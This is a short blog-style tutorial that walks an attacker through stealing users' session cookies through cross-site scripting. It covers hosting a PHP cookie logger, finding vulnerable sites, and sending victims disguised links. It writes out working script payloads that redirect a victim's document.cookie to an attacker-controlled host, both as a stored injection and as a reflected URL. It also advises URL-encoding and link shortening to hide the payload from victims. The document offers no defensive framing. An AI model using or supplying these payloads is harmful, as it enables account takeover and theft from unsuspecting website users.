Cookie Stealing From Cross Site Scripting (xss ) Attack
Hello Guys, In this post I will show you Cookie Stealing From Cross Site Scripting ( xss ) Attack. How Attacker can steal cookie from users ?. So I hope you are familiar with xss If not then please read our basic xss tutorial.
- A Cookie Stealer Code : Get It From Here
- A Free Web Hosting.
- Basic Knowledge About XSS Attack.
Cookie stealing is the process in which and attacker exploit the xss vulnerability and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.
Creating PHP Cookie Stealer
- Copy the cookie stealer code from here.
- Open the notepad or any editor and paste the code.
- Save the file with .php extension. Ex:- xss.php
Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.
Now we have Two Files : 1) xss.php
Hosting Cookie Stealer and Log file
Now we have to host both the files for hosting files you can use free web hosting or you can do secure tunelling. After hosting domain the stealer will be at : www.domain.com/xss.php
Cookie Stealing From Cross Site Scripting ( xss ) Attack
Now, we have set everything now we have to find vulnerable website to exploit to inject our malicious code.
<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>
Cookie Stealing with Stored vs Reflected XSS:
Stored: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it. It will be shown to all users. So attackers don’t need to send any link to others. Whoever visit the page, they will be vicim.
Reflected: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most of sites are vulnerable to Reflected XSS .
In Reflected, Attackers will send the injected link victims.
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>
The above link is clearly shows the script. Attacker can encode this script in url encoding and and make short the link with url shortening service like tiny url and then send to victim.
Once the victim Open the link, his/her cookie will be stored in log.txt file.